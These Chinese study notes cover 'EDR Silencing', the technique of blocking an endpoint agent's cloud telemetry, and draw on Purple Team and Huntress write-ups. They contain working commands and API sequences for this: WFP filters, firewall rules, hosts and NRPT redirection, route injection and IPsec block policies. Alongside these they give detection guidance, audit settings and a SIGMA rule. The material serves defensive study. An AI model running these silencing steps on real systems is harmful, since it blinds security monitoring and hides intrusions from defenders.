EDR Silencing 完整学习笔记

综合来源：

• Purple Team – EDR Silencing
• Huntress – Silencing the EDR Silencers

目录

1. 什么是 EDR Silencing
2. 背景与起源
3. 核心前提：为什么用户态就够了
4. 攻击方法全景
   • 4.1 Windows Firewall 规则
   • 4.2 Windows Filtering Platform (WFP)
   • 4.3 Hosts 文件篡改
   • 4.4 名称解析策略表 (NRPT)
   • 4.5 路由表篡改
   • 4.6 IPSec 过滤规则
   • 4.7 辅助 IP 地址 (IPMute)
5. WFP 深度剖析：数据包的一生
6. 防御方案：如何反制 EDR Silencing
   • 6.1 方案一：Prevention（预防）
   • 6.2 方案二：Immediate Removal（即时清除）
7. 检测工程
   • 7.1 WFP 检测
   • 7.2 Windows Firewall 规则检测
   • 7.3 Hosts 文件检测
   • 7.4 NRPT 检测
   • 7.5 IPSec 检测
8. SIGMA 规则
9. 工具汇总
10. 知识点串联：两篇文章的视角对比
11. 关键概念速查

1. 什么是 EDR Silencing

现代 EDR（端点检测与响应）的工作模式依赖持续的双向云端通信：

1
2

端点 EDR Agent  ←────→  云端管理控制台
   本地遥测收集          告警 / 响应指令

EDR Silencing 的核心思路：不终止 EDR 进程，不触碰内核驱动，只切断这条通信链路。

效果：

• EDR 进程依然存活 ✅
• 本地遥测依然收集 ✅
• 内核 Callout/Hook 依然运行 ✅
• 云端收不到任何告警 ❌
• SOC 对该端点完全失去可见性 ❌

为什么叫 “Silencing” 而不是 “Killing”？
进程还活着，只是嘴被捂住了。对防御方来说，这比杀掉进程更危险——杀进程会触发告警，但静默不会。

2. 背景与起源

关键转变：从内核态 → 用户态，从需要驱动签名 → 只需本地管理员权限。

3. 核心前提：为什么用户态就够了

这是理解整个技术的基础。

WFP 分层架构

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

┌─────────────────────────────────────┐
│           你的攻击代码               │  ← 用户态进程
│    FwpmFilterAdd0() / 防火墙API      │
└──────────────────┬──────────────────┘
                   │ RPC 调用
                   ▼
┌─────────────────────────────────────┐
│     BFE（Base Filtering Engine）    │  ← 系统服务，用户态 svchost
│         规则管理与下发               │
└──────────────────┬──────────────────┘
                   │ 规则下发到内核
                   ▼
┌─────────────────────────────────────┐
│    内核 WFP（TCPIP.sys / Netio.sys）│  ← 内核态，实际执行过滤
│         ALE 层连接授权判断           │
└─────────────────────────────────────┘

你作为攻击者只需要：

1. 有本地管理员权限
2. 调用合法的用户态 WFP API
3. 通过 RPC 让 BFE 服务把规则下发到内核

你不需要：

• 编写或加载内核驱动
• 获取驱动签名
• 绕过 PatchGuard / DSE

与老式内核驱动方法对比

4. 攻击方法全景

所有方法均需要本地管理员权限。

4.1 Windows Firewall 规则

原理：Windows Defender 防火墙本质上也是通过 WFP 实现的，但规则通过不同接口写入。

工具：

• netsh advfirewall 命令行工具
• INetFwRule / INetFwRules COM 接口（EDRSandblast 使用此方式）

规则存储位置（注册表）：

1

HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{GUID}

规则数据格式（REG_SZ 字符串）：

1

v2.32|Action=Block|Active=TRUE|Dir=Out|App=C:\...\MsSense.exe|Name=BlockEDR|

关键字段：

• Action — Block 或 Allow
• Active — 规则是否激活
• Dir — In（入站）或 Out（出站）
• App — 目标进程路径

注意：Windows Defender 开启时会阻止对 MsMpEng.exe 创建防火墙规则，但对其他 EDR 产品无此保护。

4.2 Windows Filtering Platform (WFP)

这是 EDR Silencing 的核心技术，也是最隐蔽的方式。

WFP Filter 的四种生命周期类型

工具代表：EDRSilencer

执行步骤（底层 API 调用流程）：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

// Step 1: 枚举进程，匹配已知 EDR 进程名
CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
Process32First / Process32Next  →  匹配 EDR 进程

// Step 2: 获取 EDR 进程的完整可执行路径
OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, ...)
QueryFullProcessImageNameW(hProcess, 0, fullPath, &size)

// Step 3: 将路径转为 WFP App ID（FWP_BYTE_BLOB）
FwpmGetAppIdFromFileName0(fullPath, &appId)

// Step 4: 打开 WFP 引擎会话
FwpmEngineOpen0(NULL, RPC_C_AUTHN_WINNT, NULL, NULL, &hEngine)

// Step 5: 添加 Provider（可选，用于归组管理）
FwpmProviderAdd0(hEngine, &provider, NULL)
// provider.displayData.name = L"Microsoft Corporation"  ← opsec 伪装，非必须

// Step 6: 构造 Filter 并添加
// 关键参数：
filter.layerKey    = FWPM_LAYER_ALE_AUTH_CONNECT_V4  // 出站连接授权层
filter.action.type = FWP_ACTION_BLOCK                 // 阻断
filter.weight.uint64 = 0xFFFFFFFFFFFFFFFF             // 最高优先级
cond.fieldKey      = FWPM_CONDITION_ALE_APP_ID        // 按 App 匹配
cond.matchType     = FWP_MATCH_EQUAL
cond.conditionValue.byteBlob = appId                  // = EDR 进程

FwpmFilterAdd0(hEngine, &filter, NULL, &filterId)

EDRSilencer 实际添加的 4 个 Layer（同时阻断 IPv4/IPv6 出入站）：

1
2
3
4

FWPM_LAYER_ALE_AUTH_CONNECT_V4    ← 出站 IPv4 连接授权
FWPM_LAYER_ALE_AUTH_CONNECT_V6    ← 出站 IPv6 连接授权
FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4 ← 入站 IPv4 连接授权
FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V6 ← 入站 IPv6 连接授权

WFP Filter 存储位置（注册表）：

1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{GUID}

注意：Filter 数据以 REG_BINARY 字节数组存储，不是可读字符串，解析较复杂。

关于 Provider 的说明

Provider 本质是元数据标签，用于归组管理 Filter，对过滤行为本身无影响。EDRSilencer 伪装成 “Microsoft Corporation” 是一种 opsec 技巧，但非常脆弱：

• Provider 有 GUID，微软内置 Provider 的 GUID 是固定的，伪造的一眼可识别
• Event ID 5441 会记录新 Provider 被添加，而系统自身的 Provider 不会在运行时被”新增”

命令行快速查看 WFP Filter：

1

netsh wfp show filters

输出导出到 filters.xml，可以查看所有当前 WFP 规则。

4.3 Hosts 文件篡改

原理：将 EDR 云端域名解析指向无效 IP，DNS 层面断开连接。

1
2
3
4
5

Add-Content -Path "C:\Windows\System32\drivers\etc\hosts" `
    -Value "127.0.0.1 edr.domain.com"

Add-Content -Path "C:\WINDOWS\system32\drivers\etc\hosts.ics" `
    -Value "127.0.0.1 edr.domain.com"

hosts.ics 是 Windows Internet Connection Sharing 服务生成的变体文件，也需要一并修改。

4.4 名称解析策略表 (NRPT)

原理：NRPT 控制特定域名使用哪个 DNS 服务器，优先级高于默认 DNS。将 EDR 域名解析重定向到 127.0.0.1。

1
2
3
4
5
6
7

Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" `
    -NameServers 127.0.0.1 -Comment "Silenced"

Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" `
    -NameServers 127.0.0.1 -Comment "Silenced"

Clear-DnsClientCache

Microsoft 公开发布了 Defender for Endpoint 所有域名列表，攻击者可直接利用。

NRPT 规则存储位置：

1
2

HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DnsPolicyConfig
HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsPolicyConfig

4.5 路由表篡改

原理：向路由表注入自定义路由，使发往 EDR 云端 IP 的数据包被错误路由。

1
2
3

Get-NetIPInterface
New-NetRoute -DestinationPrefix "192.168.100.0/32" `
    -InterfaceIndex 1 -PolicyStore ActiveStore

4.6 IPSec 过滤规则

原理：IPSec 过滤规则工作在网络层，即使 IPSec 未在端点上配置，也可以用 netsh 添加 Block 规则。

1
2
3
4
5
6
7

netsh ipsec static add policy name=ipurplePolicy description=ipurplePolicy
netsh ipsec static set policy name=ipurplePolicy assign=y
netsh ipsec static add filterlist name=BlockFilterList
netsh ipsec static add filter filterlist=BlockFilterList srcaddr=me dstaddr=EDR_IP protocol=tcp
netsh ipsec static add filteraction name=BlockFilterAction action=block
netsh ipsec static add rule name=BlockRule policy=ipurplePolicy \
    filterlist=BlockFilterList filteraction=BlockFilterAction

IPSec 策略存储位置：

1

HKLM\Software\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{GUID}\ipsecData

注意：IP 地址以十六进制格式存储，非人类可读。

4.7 辅助 IP 地址 (IPMute)

工具：IPMute — PowerShell 脚本，作者 Iliya Dafchev

原理：

1. 监控指定 EDR 进程的 TCP 连接
2. 捕获连接的远端 IP（即 EDR 云端 IP）
3. 将这些云端 IP 作为辅助 IP 地址绑定到本地物理网卡

效果：本地路由表会认为这些 IP 是本机地址，不再转发到互联网，连接失败。

不同添加方式对应的进程：

辅助 IP 存储位置：

1

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{GUID}\IPAddress

5. WFP 深度剖析：数据包的一生

以 CrowdStrike CSFalconService.exe 向云端发送告警为例：

被 Block 前（正常）

1
2
3
4
5
6
7
8
9
10
11
12

CSFalconService.exe
    │ connect() 到 1.2.3.4:443
    ▼
[用户态 Winsock]
    ▼
[内核 TCP/IP 栈]
    ▼
[WFP ALE_AUTH_CONNECT_V4 层]
    │ 检查所有 Filter → 无匹配 Block 规则
    │ → 决定：Permit
    ▼
[数据包出网卡] → 云端收到告警 ✅

EDRSilencer 运行后

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

CSFalconService.exe
    │ connect() 到 1.2.3.4:443
    ▼
[用户态 Winsock]
    ▼
[内核 TCP/IP 栈]
    ▼
[WFP ALE_AUTH_CONNECT_V4 层]
    │ 检查所有 Filter
    │ → 匹配：App=CSFalconService.exe, Action=BLOCK, Weight=MAX
    │ → 决定：Block
    ▼
connect() 返回 WSAEACCES / WSAECONNREFUSED
    │
    ├─ 进程还活着 ✅
    ├─ 本地日志还在记录 ✅
    ├─ 内核 Callout 还在运行 ✅
    └─ 告警永远出不去 ❌

为什么选 ALE_AUTH_CONNECT 层？

• 连接建立阶段就介入，不等数据包发出再丢弃
• 支持按进程（App ID）精确匹配
• 优先级高于 OUTBOUND_TRANSPORT 层，无法绕过
• EDR 的内核 Callout 本身也注册在 WFP 的其他层，但不能阻止自身流量被 Block

6. 防御方案：如何反制 EDR Silencing

来自 Huntress 的 Jonathan Johnson（曾在 BlackHat 演讲）提出了两种方案，核心思路都是：监控注册表变化，然后采取行动。

6.1 方案一：Prevention（预防）

机制：在内核中注册 RegNtPreSetValueKey 注册表预回调。

1
2
3
4
5
6
7
8
9
10
11

攻击者调用 FwpmFilterAdd0()
    ↓
BFE 准备写注册表
    ↓
触发 RegNtPreSetValueKey（写入前回调）
    ↓
EDR 驱动检查：路径匹配 WFP Filter 路径？数据包含自身进程名？
    ↓ 是
返回 STATUS_ACCESS_DENIED
    ↓
写入被阻止，Filter 规则无法持久化

优点：完全阻断，攻击者无法成功添加规则。

缺点：

• 需要在内核中解析数据，存在性能风险
• Firewall 规则是字符串（易解析），WFP Filter 是 REG_BINARY 字节数组（内核中解析较危险）

6.2 方案二：Immediate Removal（即时清除）

机制：注册 RegNtPostSetValueKey 注册表后回调，允许写入后立即清除。

架构设计（来自 JonMon PoC）：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

攻击者调用 FwpmFilterAdd0()
    ↓
规则写入注册表（短暂生效）
    ↓
触发 RegNtPostSetValueKey（写入后回调）
    ↓
内核驱动：将变化数据通过通道发送到用户态 Agent
    ↓
用户态 Agent（解析 + 决策，避免内核中做复杂操作）
    ├─ 对于 Firewall 规则：
    │      验证注册表值 → 调用 INetFwRules::Remove()
    │
    └─ 对于 WFP Filter：
           FwpmFilterDeleteById0()   ← 删除 Filter
           FwpmProviderDeleteByKey0() ← 删除 Provider

关键点：

• 不能只删注册表键，必须调用对应的清理 API，否则内核规则不会刷新（除非重启）
• 规则被添加到完全生效之间有极短时间窗口，但在实践中几乎无法被利用
• 也可以监听 Event ID 5447（新 WFP 规则被创建）来触发清除，而不依赖内核回调

两种方案对比：

7. 检测工程

7.1 WFP 检测

需要启用的审计策略（默认均未开启）

1
2
3
4
5

计算机配置 > Windows 设置 > 安全设置 > 高级审核策略配置 > 审核策略

> 策略更改 > 审核筛选平台策略更改   (Audit Filtering Platform Policy Change)
> 对象访问 > 审核筛选平台连接        (Audit Filtering Platform Connection)
> 对象访问 > 审核筛选平台数据包丢弃  (Audit Filtering Platform Packet Drop)

⚠️ 启用这些策略会显著增加日志量，需评估存储容量。

关键 Event ID 映射

重点关注 5444 和 5157，尤其是：

• 5441：新增 Provider 声称是 Microsoft 但 GUID 不匹配系统内置值
• 5157：EDR 进程的出站连接被 Block（这是最直接的 IOC）

注册表监控

1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter

监控此键下的新增子键（新 Filter 被写入）。

工具辅助

• netsh wfp show filters — 导出当前所有 WFP 规则到 XML
• WFP Explorer — 图形化查看 WFP 规则
• Get-FwFilter -FilterId <id> 或 Get-FwFilter -FilterKey <guid> — PowerShell 查询特定 Filter

7.2 Windows Firewall 规则检测

监控注册表路径：

1

HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{GUID}

解析 REG_SZ 字符串中的 App= 字段，判断是否指向已知 EDR 进程路径。

7.3 Hosts 文件检测

启用审计策略

1
2

对象访问 > 审核文件系统 (Audit File System)
对象访问 > 审核句柄操作 (Audit Handle Manipulation)

在文件系统审计中手动添加 hosts 文件路径，并配置 Read/Write/Modify 审计权限。

触发 Event ID：4663（对象被访问/修改）

7.4 NRPT 检测

监控注册表路径：

1

HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsPolicyConfig

注意：Add-DnsClientNrptRule 内部通过 WMI 操作，因此修改行为来自 WmiPrvSE.exe 进程。

触发 Event ID：

7.5 IPSec 检测

监控注册表路径：

1

HKLM\Software\Policies\Microsoft\Windows\IPSec\Policy\Local\

触发 Event ID：

关联点：netsh.exe 进程访问 IPSec 注册表键 + 5460/5471 事件同时出现。

8. SIGMA 规则

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

title: WFP Blocked Outbound Connection From Common EDR Agent Binary
id: 6b2b5db7-8f7e-4b6e-b9d4-29f0a9edc0d1
status: Production
description: >
  检测 WFP 阻断已知 EDR/AV 进程出站连接的事件（Event ID 5157），
  可能表明攻击者使用 WFP 规则实施 EDR Silencing。
references:
  - https://github.com/netero1010/EDRSilencer
author: Panos Gkatziroulis
date: 2026-01-06
tags:
  - attack.defense-evasion
  - attack.t1562
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 5157
    Direction|contains: 'Outbound'
    Application|endswith:
      - '\MsSense.exe'         # Microsoft Defender for Endpoint
      - '\SenseIR.exe'
      - '\SenseCncProxy.exe'
      - '\SenseNdr.exe'
      - '\MsMpEng.exe'         # Windows Defender
      - '\NisSrv.exe'
      - '\CSFalconService.exe' # CrowdStrike Falcon
      - '\CylanceSvc.exe'      # Cylance
      - '\elastic-agent.exe'   # Elastic
      - '\elastic-endpoint.exe'
      - '\SentinelAgent.exe'   # SentinelOne
      - '\TaniumClient.exe'    # Tanium
  condition: selection
falsepositives:
  - 合法防火墙策略 Block
  - EDR 后端临时故障期间恰好有本地策略变更
level: high

9. 工具汇总

⚠️ WFP_EDR 没有公开源码，不要在生产环境中运行不可信二进制文件。

10. 知识点串联：两篇文章的视角对比

最重要的共同结论

1. 攻击侧：EDR Silencing 不需要内核权限，本地管理员即可，这使其威胁面极广。
2. 防御侧：所有 EDR Silencing 方法最终都会落到注册表写入，这是最通用的检测锚点。
3. 运营侧：默认审计策略不足以覆盖这些威胁，需要主动启用 WFP / 文件系统 / 注册表审计。

11. 关键概念速查

笔记整理完毕。建议配合 WFP Explorer 在测试环境中实际观察 WFP 规则变化，加深理解。